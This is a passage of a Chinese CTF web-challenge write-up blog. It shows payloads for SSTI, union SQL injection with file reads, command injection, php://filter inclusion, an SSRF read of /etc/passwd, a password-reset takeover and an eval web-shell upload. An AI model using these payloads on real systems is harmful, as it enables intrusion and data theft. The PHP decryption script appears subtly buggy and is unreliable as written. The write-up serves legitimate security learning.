    <span class="token keyword">for</span><span class="token punctuation">(</span><span class="token variable">$_0</span><span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">;</span><span class="token variable">$_0</span><span class="token operator">&lt;</span><span class="token function">strlen</span><span class="token punctuation">(</span><span class="token variable">$_o</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token variable">$_0</span><span class="token operator">++</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
       
        <span class="token variable">$_c</span><span class="token operator">=</span><span class="token function">substr</span><span class="token punctuation">(</span><span class="token variable">$_o</span><span class="token punctuation">,</span><span class="token variable">$_0</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token variable">$__</span><span class="token operator">=</span><span class="token function">ord</span><span class="token punctuation">(</span><span class="token variable">$_c</span><span class="token punctuation">)</span><span class="token operator">+</span><span class="token number">1</span><span class="token punctuation">;</span>
        <span class="token variable">$_c</span><span class="token operator">=</span><span class="token function">chr</span><span class="token punctuation">(</span><span class="token variable">$__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token variable">$_</span><span class="token operator">=</span><span class="token variable">$_</span><span class="token operator">.</span><span class="token variable">$_c</span><span class="token punctuation">;</span>   
    <span class="token punctuation">&#125;</span> 
    <span class="token keyword">return</span> <span class="token function">str_rot13</span><span class="token punctuation">(</span><span class="token function">strrev</span><span class="token punctuation">(</span><span class="token function">base64_encode</span><span class="token punctuation">(</span><span class="token variable">$_</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token comment">/*
   逆向加密算法，解密$miwen就是flag
*/</span>
<span class="token delimiter important">?></span></span> <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>第一次遇到，记录一下。<br>我们只需要逆向解密即可。</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$str</span><span class="token operator">=</span><span class="token string double-quoted-string">"a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"</span><span class="token punctuation">;</span>
<span class="token variable">$_</span><span class="token operator">=</span><span class="token function">base64_decode</span><span class="token punctuation">(</span><span class="token function">strrev</span><span class="token punctuation">(</span><span class="token function">str_rot13</span><span class="token punctuation">(</span><span class="token variable">$str</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$_o</span><span class="token operator">=</span><span class="token constant">NULL</span><span class="token punctuation">;</span>

    <span class="token keyword">for</span><span class="token punctuation">(</span><span class="token variable">$_0</span><span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">;</span><span class="token variable">$_0</span><span class="token operator">&lt;</span><span class="token function">strlen</span><span class="token punctuation">(</span><span class="token variable">$_</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token variable">$_0</span><span class="token operator">++</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
       
        <span class="token variable">$_c</span><span class="token operator">=</span><span class="token function">substr</span><span class="token punctuation">(</span><span class="token variable">$_</span><span class="token punctuation">,</span><span class="token variable">$_0</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token variable">$__</span><span class="token operator">=</span><span class="token function">ord</span><span class="token punctuation">(</span><span class="token variable">$_c</span><span class="token punctuation">)</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">;</span>
        <span class="token variable">$_c</span><span class="token operator">=</span><span class="token function">chr</span><span class="token punctuation">(</span><span class="token variable">$__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token variable">$_</span><span class="token operator">=</span><span class="token variable">$_o</span><span class="token operator">.</span><span class="token variable">$_c</span><span class="token punctuation">;</span>   
    <span class="token punctuation">&#125;</span> 
<span class="token keyword">echo</span> <span class="token function">strrev</span><span class="token punctuation">(</span><span class="token variable">$_o</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>得到flag。</p>
<h2 id="shrine"><a href="#shrine" class="headerlink" title="shrine"></a>shrine</h2><p><img src="https://img-blog.csdnimg.cn/523623501a0d4d65b734a05f6fae1ba2.png" alt="2"></p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> flask
<span class="token keyword">import</span> os

app <span class="token operator">=</span> flask<span class="token punctuation">.</span>Flask<span class="token punctuation">(</span>__name__<span class="token punctuation">)</span>

app<span class="token punctuation">.</span>config<span class="token punctuation">[</span><span class="token string">'FLAG'</span><span class="token punctuation">]</span> <span class="token operator">=</span> os<span class="token punctuation">.</span>environ<span class="token punctuation">.</span>pop<span class="token punctuation">(</span><span class="token string">'FLAG'</span><span class="token punctuation">)</span><span class="token operator">//</span>注册了一个FLAG的config，如果没有过滤的话就直接<span class="token punctuation">&#123;</span><span class="token punctuation">&#123;</span>config<span class="token punctuation">&#125;</span><span class="token punctuation">&#125;</span>


<span class="token decorator annotation punctuation">@app<span class="token punctuation">.</span>route</span><span class="token punctuation">(</span><span class="token string">'/'</span><span class="token punctuation">)</span>
<span class="token keyword">def</span> <span class="token function">index</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">return</span> <span class="token builtin">open</span><span class="token punctuation">(</span>__file__<span class="token punctuation">)</span><span class="token punctuation">.</span>read<span class="token punctuation">(</span><span class="token punctuation">)</span>


<span class="token decorator annotation punctuation">@app<span class="token punctuation">.</span>route</span><span class="token punctuation">(</span><span class="token string">'/shrine/&lt;path:shrine>'</span><span class="token punctuation">)</span>
<span class="token keyword">def</span> <span class="token function">shrine</span><span class="token punctuation">(</span>shrine<span class="token punctuation">)</span><span class="token punctuation">:</span>

    <span class="token keyword">def</span> <span class="token function">safe_jinja</span><span class="token punctuation">(</span>s<span class="token punctuation">)</span><span class="token punctuation">:</span>
        s <span class="token operator">=</span> s<span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">'('</span><span class="token punctuation">,</span> <span class="token string">''</span><span class="token punctuation">)</span><span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">')'</span><span class="token punctuation">,</span> <span class="token string">''</span><span class="token punctuation">)</span>
        blacklist <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token string">'config'</span><span class="token punctuation">,</span> <span class="token string">'self'</span><span class="token punctuation">]</span>
        <span class="token keyword">return</span> <span class="token string">''</span><span class="token punctuation">.</span>join<span class="token punctuation">(</span><span class="token punctuation">[</span><span class="token string">'&#123;&#123;% set &#123;&#125;=None%&#125;&#125;'</span><span class="token punctuation">.</span><span class="token builtin">format</span><span class="token punctuation">(</span>c<span class="token punctuation">)</span> <span class="token keyword">for</span> c <span class="token keyword">in</span> blacklist<span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">+</span> s

    <span class="token keyword">return</span> flask<span class="token punctuation">.</span>render_template_string<span class="token punctuation">(</span>safe_jinja<span class="token punctuation">(</span>shrine<span class="token punctuation">)</span><span class="token punctuation">)</span>


<span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">'__main__'</span><span class="token punctuation">:</span>
    app<span class="token punctuation">.</span>run<span class="token punctuation">(</span>debug<span class="token operator">=</span><span class="token boolean">True</span><span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>ssti模板注入，是pythonFlask框架。看到<br><code>@app.route(&#39;/shrine/&lt;path:shrine&gt;&#39;)</code>访问路径<code>http://61.147.171.105:64429/shrine/%7B%7B8*8%7D%7D</code>存在ssti模板注入漏洞。<br><code>safe_jinja</code>函数对**(，)，config，self**进行过滤。<br><img src="https://img-blog.csdnimg.cn/45c0d3fbef914c998da7b8cc9faac0f5.png" alt="1">查看一下app下的config。</p>
<p>文章中了解到：<br><strong>get_flashed_messages函数</strong>：<code>&#123;&#123;get_flashed_messages.__globals__['current_app'].config['FLAG']&#125;&#125;</code><br><strong>url_for函数</strong>：<code>&#123;&#123;url_for.__globals__['current_app'].config&#125;&#125;</code><br><img src="https://img-blog.csdnimg.cn/4609f4f593f249f3b6aabc5fa7cc213c.png" alt="2"><br>得到flag。</p>
<h2 id="fakebook"><a href="#fakebook" class="headerlink" title="fakebook"></a>fakebook</h2><p>非常具有学习价值</p>
<p><img src="https://img-blog.csdnimg.cn/b9a7ec91e3214f8bb606a267bb14632b.png" alt="1"><br>注册一个账号登陆。<br><img src="https://img-blog.csdnimg.cn/f02e85228c7740f685c0fc3952ff3d11.png" alt="2"><br><code>?no=1 and 1=1</code>正常回显，<code>?no=1 and 1=2</code>报错。存在SQL注入。<br><code>?no=1 order by 5</code>报错<br><img src="https://img-blog.csdnimg.cn/2b8f182925864af49d2e3b146c651a8c.png" alt="3"><br>开始爆破。<br>发现加载<code>?no=1 union select 1,2,3,4</code>出现<br><img src="https://img-blog.csdnimg.cn/1d4d6d53e1444e8c80cc361073c38eda.png" alt="1"><br>肯定有东西被过滤了。测试发现输入<code>-1/**/union/**/select/**/1,2,3,4</code>正常。<code>++可以代替/**/</code><br><img src="https://img-blog.csdnimg.cn/d6f1a1faeadb4b2ba8d126ca9b202e75.png" alt="4"><br>存在反序列化，发现2处可以回显。继续测试<br><code>?no=-1/**/union/**/select/**/1,table_name,3,4 from INFORMATION_SCHEMA.TABLES -- -</code><br><code>?no=-1/**/union/**/select/**/1,group_concat(column_name),3,4 from INFORMATION_SCHEMA.columns where table_name=&quot;users&quot; -- -</code><br><img src="https://img-blog.csdnimg.cn/757a55887b714a0d9f8e953453f4c150.png" alt="2"><br>存在反序列化。</p>
<blockquote>
<p>O:8:”UserInfo”:3:{s:4:”name”;s:3:”rgg”;s:3:”age”;i:48;s:4:”blog”;s:7:”123.com”;}</p>
</blockquote>
<p>后面真是不会了。了解一下师傅们的文章。<br><strong>法一</strong><br>采用构造file协议去读取&#x2F;var&#x2F;www&#x2F;html&#x2F;flag.php的内容（file协议主要用于访问计算机本地文件，基本格式为：file:&#x2F;&#x2F;&#x2F;文件路径</p>
<blockquote>
<p>-1 &#x2F;<strong>&#x2F;union &#x2F;</strong>&#x2F; select 1,2 ,3,’O:8:”UserInfo”:3:{s:4:”name”;s:1:”1”;s:3:”age”;i:18;s:4:”blog”;s:29:”file:&#x2F;&#x2F;&#x2F;var&#x2F;www&#x2F;html&#x2F;flag.php”;}’#</p>
</blockquote>
<p><img src="https://img-blog.csdnimg.cn/b4cdabced702488fad045fa3a4349ad6.png" alt="2"></p>
<p><strong>法二</strong><br> 在MySQL中，LOAD_FILE()函数读取一个文件并将其内容作为字符串返回。</p>
<blockquote>
<p>-1 &#x2F;<strong>&#x2F;union &#x2F;</strong>&#x2F; select 1,load_file(‘&#x2F;var&#x2F;www&#x2F;html&#x2F;flag.php’) ,3,4#</p>
</blockquote>
<p><img src="https://img-blog.csdnimg.cn/1dbe5ddda5414ef98dbf713cc9269ad9.png" alt="3"></p>
<h2 id="Cat"><a href="#Cat" class="headerlink" title="Cat"></a>Cat</h2><p><img src="https://img-blog.csdnimg.cn/ed1db60906fd457e9bfd3bc7dbf9f8e8.png" alt="1"><br>一道非常无厘头的题<br>一打开靶场以为原来做过类似的题。就直接<strong>127.0.0.1|ls</strong>，看来是大意了。<br><img src="https://img-blog.csdnimg.cn/98ece7b60e704191a326c30e875fef28.png" alt="2"><br>爆破一下看看过滤了什么<br><img src="https://img-blog.csdnimg.cn/ee2d13cafd3e41e0b42b1104dde8b11c.png" alt="2"></p>
<p><img src="https://img-blog.csdnimg.cn/051cc20d945a4c9c8eba5da238368110.png" alt="3">453的没有过滤。<br><img src="https://img-blog.csdnimg.cn/0b317f3b22524f75a9c568a3801c5d6d.png" alt="5"></p>
<p>对@进行url编码%40，还是没用。<br>试试宽字符%EF<br>得到内容。保存为html文件。<br><img src="https://img-blog.csdnimg.cn/6e906ca935e44e08985578b99ca60031.png" alt="2"><br><img src="https://img-blog.csdnimg.cn/6ef3195b6ae148e09b3132416f430317.png" alt="5"><br>查资料后原来是django报错，仔细看文档发现绝对路径，找一下发现数据库绝对路径</p>
<blockquote>
<p>&#x2F;opt&#x2F;api&#x2F;database.sqlite3 php的curl+@绝对路径文件名</p>
</blockquote>
<p><img src="https://img-blog.csdnimg.cn/2c33bda622c940e0bc0f67609368b994.png" alt="5"><br>宽字节+&#x2F;opt&#x2F;api&#x2F;database.sqlite3报错出内容，查找得到flag。<br><img src="https://img-blog.csdnimg.cn/546cdd2af98047b481d0122cc007eb32.png" alt="5"></p>
<h2 id="泰山杯-简单的文件包含"><a href="#泰山杯-简单的文件包含" class="headerlink" title="泰山杯-简单的文件包含"></a>泰山杯-简单的文件包含</h2><p><img src="https://img-blog.csdnimg.cn/b1427ceb81ee46f5bff6a37e6500cc57.png" alt="1"></p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">include</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"./check.php"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'filename'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
        <span class="token variable">$filename</span>  <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'filename'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
        <span class="token keyword">include</span><span class="token punctuation">(</span><span class="token variable">$filename</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>题目中包含了check.php文件，可能是过滤了一些函数，注意一下。整体看起来很简单，读去一个文件看看<br>payload:<strong><a target="_blank" rel="noopener" href="http://61.147.171.105:49222/?filename=check.php">http://61.147.171.105:49222/?filename=check.php</a></strong><br><img src="https://img-blog.csdnimg.cn/2fa8d03887be43f8ac061799752d2b73.png" alt="2">正确的用法，错误的方法？采用伪协议试试文件包含，经过几次测试发现只有使用php:&#x2F;&#x2F;filter读取文件时才会显示<strong>do not hack！</strong>，其他的回显均为上图。那么就从php:&#x2F;&#x2F;filter下手。通过测试了几个过滤器发现，能用的过滤器只有这个——**convert.iconv.***。推荐一篇文章<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_44657899/article/details/109300335">php:&#x2F;&#x2F;filter的各种过滤器</a></p>
<blockquote>
<p>convert.iconv.<em>的编码方式有以下几种：<br>UCS-4</em><br>UCS-4BE<br>UCS-4LE*<br>UCS-2<br>UCS-2BE<br>UCS-2LE<br>UTF-32*<br>UTF-32BE*<br>UTF-32LE*<br>UTF-16*<br>UTF-16BE*<br>UTF-16LE*<br>UTF-7<br>UTF7-IMAP<br>UTF-8*<br>ASCII*<br>使用方法：convert.iconv.&lt;input-encoding&gt;.&lt;output-encoding&gt;</p>
</blockquote>
<p>随便选两个试试：<br><img src="https://img-blog.csdnimg.cn/e139f5936a634f27851a021afc968e3f.png" alt="1">使用burp快一点<br><img src="https://img-blog.csdnimg.cn/8a26b67d40c54abf9b4f646cc65fb213.png" alt="2"><img src="https://img-blog.csdnimg.cn/7f4499930bc548d78033057c9a92cf05.png" alt="3">拿到flag。</p>
<h2 id="信通院-SSRF-Me"><a href="#信通院-SSRF-Me" class="headerlink" title="信通院 SSRF-Me"></a>信通院 SSRF-Me</h2><p>看来考点是ssrf。<br><img src="https://img-blog.csdnimg.cn/6e134931c77f4b4a8b51c32ed069735d.png" alt="1"><br>查看源码一下<br><img src="https://img-blog.csdnimg.cn/0691770356f3440db6bfa7c51ab9e2b6.png" alt="2"><br>由此可以说明请求地址为1270.0.1<br><code>Captcha: substr(md5(captcha), -6, 6) == &quot;b15ed1&quot;</code><br>意思是取MD5加密后的字符从后六位开始数六位且字符是b15ed1，那么到这里就要开始爆破原始数据了</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$captcha</span><span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">;</span>
<span class="token keyword">while</span> <span class="token punctuation">(</span><span class="token constant boolean">true</span><span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">substr</span><span class="token punctuation">(</span><span class="token function">md5</span><span class="token punctuation">(</span><span class="token variable">$captcha</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token operator">-</span><span class="token number">6</span><span class="token punctuation">,</span> <span class="token number">6</span><span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token string double-quoted-string">"b15ed1"</span><span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
<span class="token keyword">echo</span> <span class="token variable">$captcha</span><span class="token punctuation">;</span>
<span class="token keyword">break</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
<span class="token keyword">else</span>
<span class="token variable">$captcha</span><span class="token operator">++</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
<span class="token delimiter important">?></span></span>

//输出结果：23129<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>当输入框内输入<strong>127.0.0.1:80</strong>时，会返回两个输入框，那么利用ssrf的漏洞，使用伪协议<br>输入<strong>file:&#x2F;&#x2F;&#x2F;etc&#x2F;passwd</strong>时成功返回<br><img src="https://img-blog.csdnimg.cn/c582bb91a3e7459a897e3524327530fa.png" alt="3">读取flag <strong>file:&#x2F;&#x2F;&#x2F;flag</strong>，flag关键字符过滤了。url编码绕过，浏览器上对flag编码一次，但是burp上需要对flag编码两次哦。</p>
<blockquote>
<p>file:&#x2F;&#x2F;&#x2F;%66%6c%61%67<br>file:&#x2F;&#x2F;&#x2F;%2566%256c%2561%2567</p>
</blockquote>
<h2 id="bug（RCTF2021）"><a href="#bug（RCTF2021）" class="headerlink" title="bug（RCTF2021）"></a>bug（RCTF2021）</h2><p>全程BURP挂代理，能够从每一个包中获得有效信息，还是要仔细观察！！！<br>打开就是登录框：<br><img src="https://img-blog.csdnimg.cn/3efee6e2436046548b1c91b628940271.png" alt="1"><br>尝试admin登录，弱密码无果。先注册一个账号，注册admin显示用户名已存在，换test。<br>登陆成功后尝试每一个功能点：<br>使用manage时<br><img src="https://img-blog.csdnimg.cn/bc84396bd69046409299c59b0d5b7305.png" alt="123"><br>personal功能点：<br>这里比较可以的地方是cookie的user，应该是MD5加密，解密需要付费，暂时不考虑。还有就是<strong>uid</strong>值。<br>直接改为1是不允许的，找其他思路。看能不能找到不需要带cookie-user的包<br><img src="https://img-blog.csdnimg.cn/13e8f73a143545dbbf0c9b6ab04bb330.png" alt="2"></p>
<p>登出之后看找回密码功能点。<br>由于我知道test用户的信息，直接输入<br><img src="https://img-blog.csdnimg.cn/44ed7431b53547d8aac7f20e35791019.png" alt="123"><br>这个包的详情如下：他没有进行user验证后面有希望。<br><img src="https://img-blog.csdnimg.cn/a57eb39e769e437db01e532a5e5fd17d.png" alt="5"><br>下面这个是输入新密码的包：</p>
<p><img src="https://img-blog.csdnimg.cn/5f729b4838de4ca384d994ffd06da6a4.png" alt="4"><br>在这里尝试把username改为admin，成功修改admin密码<br><img src="https://img-blog.csdnimg.cn/5c48c75714ab4dbbab310d677fe9ee7b.png" alt="5"><br>随后成功登录admin账号。<br><img src="https://img-blog.csdnimg.cn/699097f08553466ca469704221d959ca.png" alt="1"><br>使用manage功能点发现IP不被允许。<br>直接X-Forwarded-For: 127.0.0.1，出现界面<br><img src="https://img-blog.csdnimg.cn/8826e8d89a444c78ae6bf348ebc53225.png" alt="2"></p>
<p>查看源代码发现可疑<br><img src="https://img-blog.csdnimg.cn/8af6010afbe345ffbf0c271092bfab0c.png" alt="1"></p>
<p>试试文件上传<strong>index.php?module&#x3D;filemanage&amp;do&#x3D;upload</strong>，开始文件上传绕过了。<br>上传普通文件<br><img src="https://img-blog.csdnimg.cn/0d3d7f7d4fb5489589b4ec2c5c1a4836.png" alt="1"><br>上传php文件<br><img src="https://img-blog.csdnimg.cn/6b49b925f1cd438188b1cc57f1273f96.png" alt="1"><br>经过一番折腾，该文件后缀php4,上传文件内容<code>&lt;script language=&#39;php&#39;&gt;alert(@eval($_POST[1]))&lt;script&gt;</code><br>得到flag。<br><img src="https://img-blog.csdnimg.cn/9e5e3e5165bc4e4da1937253f9808910.png" alt="2"></p>
 
      <!-- reward -->
      
      <div id="reword-out">
        <div id="reward-btn">
          打赏
        </div>
      </div>
      
    </div>
    

    <!-- copyright -->
    
    <div class="declare">
      <ul class="post-copyright">
        <li>
          <i class="ri-copyright-line"></i>
          <strong>版权声明： </strong>
          
          本博客所有文章除特别声明外，著作权归作者所有。转载请注明出处！
          
        </li>
      </ul>
    </div>
    
    <footer class="article-footer">
       
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=http://3143047748.github.io/2023/03/18/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C-web/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ctf/" rel="tag">ctf</a></li></ul>

    </footer>
  </div>

   
  <nav class="article-nav">
    
      <a href="/2023/03/23/Nmap%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" class="article-nav-link">
        <strong class="article-nav-caption">上一篇</strong>
        <div class="article-nav-title">
          
            Nmap学习笔记
          
        </div>
      </a>
    
    
      <a href="/2023/03/16/SQL%E6%B3%A8%E5%85%A5%E4%B9%8BHandler%E5%91%BD%E4%BB%A4%E5%92%8C%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">SQL注入之Handler命令和堆叠注入</div>
      </a>
    
  </nav>

   
<!-- valine评论 -->
<div id="vcomments-box">
  <div id="vcomments"></div>
</div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="https://cdn.staticfile.org/valine/1.4.16/Valine.min.js"></script>
<script>
  new Valine({
    el: "#vcomments",
    app_id: "5s6sYhVyYIhL1fb7zrErH8BX-gzGzoHsz",
    app_key: "829xTABHQSNKYRHRILDlEluh",
    path: window.location.pathname,
    avatar: "monsterid",
    placeholder: "给我的文章加点评论吧~",
    recordIP: true,
  });
  const infoEle = document.querySelector("#vcomments .info");
  if (infoEle && infoEle.childNodes && infoEle.childNodes.length > 0) {
    infoEle.childNodes.forEach(function (item) {
      item.parentNode.removeChild(item);
    });
  }
</script>
<style>
  #vcomments-box {
    padding: 5px 30px;
  }

  @media screen and (max-width: 800px) {
    #vcomments-box {
      padding: 5px 0px;
    }
  }

  #vcomments-box #vcomments {
    background-color: #fff;
  }

  .v .vlist .vcard .vh {
    padding-right: 20px;
  }

  .v .vlist .vcard {
    padding-left: 10px;
  }
</style>

 
   
  
   
    <script src="https://cdn.staticfile.org/twikoo/1.4.18/twikoo.all.min.js"></script>
    <div id="twikoo" class="twikoo"></div>
    <script>
        twikoo.init({
            envId: ""
        })
    </script>
 
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2022-2023
        <i class="ri-heart-fill heart_icon"></i> n0rt6
      </li>
    </ul>
    <ul>
      <li>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>访问人数:<span id="busuanzi_value_site_uv"></span></span>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>浏览次数:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
        <li>
          <a href="https://beian.miit.gov.cn/" target="_black" rel="nofollow">豫ICP备88888888</a>
        </li>
        
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
        <script type="text/javascript" src='https://s9.cnzz.com/z_stat.php?id=1278069914&amp;web_id=1278069914'></script>
        
      </li>
    </ul>
  </div>
</footer>    
    </main>
    <div class="float_btns">
      <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

    </div>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/ayer-side.png" alt="n0rt6&#39;s bolg"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">Index</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">Archives</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">Categories</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">Tags</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/friends">Friends</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/about">About Me</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="搜索">
        <i class="ri-search-line"></i>
      </a>
      
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>请我喝杯咖啡吧~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="/images/alipay.jpg">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="/images/wechat.jpg">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-3.6.0.min.js"></script>
 
<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->
 
<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: ".tocbot",
    contentSelector: ".article-entry",
    headingSelector: "h1, h2, h3, h4, h5, h6",
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: "main",
    positionFixedSelector: ".tocbot",
    positionFixedClass: "is-position-fixed",
    fixedSidebarOffset: "auto",
  });
</script>

<script src="https://cdn.staticfile.org/jquery-modal/0.9.2/jquery.modal.min.js"></script>
<link
  rel="stylesheet"
  href="https://cdn.staticfile.org/jquery-modal/0.9.2/jquery.modal.min.css"
/>
<script src="https://cdn.staticfile.org/justifiedGallery/3.8.1/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->
 <!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
